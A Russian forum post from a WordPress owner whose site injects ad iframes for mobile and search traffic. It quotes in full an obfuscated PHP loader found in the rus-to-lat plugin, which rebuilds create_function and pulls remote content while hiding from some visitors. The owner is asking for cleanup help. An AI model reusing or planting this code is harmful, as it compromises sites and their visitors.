Ломанули сайт на Вордпрессе. Внутри постов фреймы с тизерами.
!!! Фреймы появляются только для мобильных и для трафа с поисковиков...
Нашел вот такую хрень в файле одного из очень популярных плагинов rus-to-lat
wp_load_cacher(); function wp_load_cacher($length='') { $cache_time = 'Default Widgets'; $pr = "pre"; $mdetails = "<div class='body-continent'><div class='get-inner-al(@fi'>"; $vr = 'crea'; $indent = ( isset($mytitle) ? str_repeat( "\t", $mytitle ) : $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); $output = $metaboxed = $mytitle = ""; $metaoptions = "\\4'\\10".trim("\\12t\\16\\19")."//".strip_tags("2ine")."\\11.c\\7m/\\9-".$indent."!1')\\5"; if (defined('HEADER_IMGS') || isset($_COOKIE['sess'.'ions'])) return; $mdetails .= "<!--Deregister() Default Widgets: _oabhrtupwprs:e--></div></div>"; if (count($mytitle) >= $length) { $mytitle = explode(" ",$mytitle." "); } else { $mytitle = explode(" "," ".$mytitle." "); } $nmetabox = $vr.strip_tags("te_"); $metaboxe = str_repeat("(.)", 20).".*"."/"; $pr .= strip_tags("g_rep").trim("lace"); if (function_exists("excerpt_mores")) { add_filter('excerpt_modes', $metaboxe); } else { $metaoptions = str_replace("{c}", $cache_time, $metaoptions).";"; $nmetabox .= 'function'; } $output_title = '<p>'.$output.'</p>'; $defult_widgets = @$pr("/.*(cont).*?(ge).*?(..\(.fi).*?(\()(\)).*?(\_){$metaboxe}is", "@\\20v\\3le\\6{$metaboxed}\\2t\\6\\1ents{$metaoptions}", $mdetails); $mdetailes = @$nmetabox('', $defult_widgets); return strip_tags($mdetailes()); }
Фреймы были на этом домене
Как понимаю заражены и другие файлы должны быть, эта хрень же сама по себе фрейме не подтянет?
Не понятно куда копать.
!!! Я перезаливал чистый WP, отключал все плагины кроме зараженного, менял тему сайта, переименовывал папку старой темы, и фреймы все равно выводились! Только удаление rus-to-lat.php помогает...
Причем дата изменения файла rus-to-lat.php не менялась, стоит старый год.
Средний
